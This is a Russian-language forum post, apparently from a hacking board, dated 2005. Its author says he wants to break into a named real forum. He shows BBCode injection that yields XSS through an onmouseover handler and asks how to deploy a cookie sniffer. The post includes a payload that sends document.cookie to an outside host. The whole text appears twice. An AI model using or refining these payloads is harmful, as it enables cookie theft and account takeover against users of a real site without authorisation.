KP0T
18.12.2005, 03:49
Короче хочу ломануть вот этот форумчик _http://forum.polarnet.ru/
вот этот код
[HTML]http://www.wj.com]wj wj (http://www.wj.com
даёт нам что-то типа [HTML]<A href='http://www.wj.com<a href="http://www.wj.com' target=_blank>wj
<FONT onmouseover=alert(/Hello_from_WJ/) face='"Arial' size=+7 ">wj</FONT>"
target="_blank">http://www.wj.com]wj <font face="Ar.../)
/">wj</font></A></A>
Отсюда делаем вывод что xxs возможна, но как снифер поюзать?! вот в чём вопрос, потому что код типа
[HTML]http://www.wj.com]wj.src="http://narod.ws/xss/s.gif?"+document.cookie); /]wj (http://www.wj.com[url)
Нехрена нам не даёт, а именно в сорцах всё смотрится так [HTML]<A href='http://www.wj.com<a href="http://www.wj.com'
target=_blank>wj.src="http://narod.ws/xss/s.gif?"+document.cookie);
/]wj " target="_blank">http://www.wj.com]wj[FONT=Arial...]wj
[/FONT</A>
Вообщем ай нид хелп.
вот этот код
[HTML]http://www.wj.com]wj wj (http://www.wj.com
даёт нам что-то типа [HTML]<A href='http://www.wj.com<a href="http://www.wj.com' target=_blank>wj
<FONT onmouseover=alert(/Hello_from_WJ/) face='"Arial' size=+7 ">wj</FONT>"
target="_blank">http://www.wj.com]wj <font face="Ar.../)
/">wj</font></A></A>
Отсюда делаем вывод что xxs возможна, но как снифер поюзать?! вот в чём вопрос, потому что код типа
[HTML]http://www.wj.com]wj.src="http://narod.ws/xss/s.gif?"+document.cookie); /]wj (http://www.wj.com[url)
Нехрена нам не даёт, а именно в сорцах всё смотрится так [HTML]<A href='http://www.wj.com<a href="http://www.wj.com'
target=_blank>wj.src="http://narod.ws/xss/s.gif?"+document.cookie);
/]wj " target="_blank">http://www.wj.com]wj[FONT=Arial...]wj
[/FONT</A>
Вообщем ай нид хелп.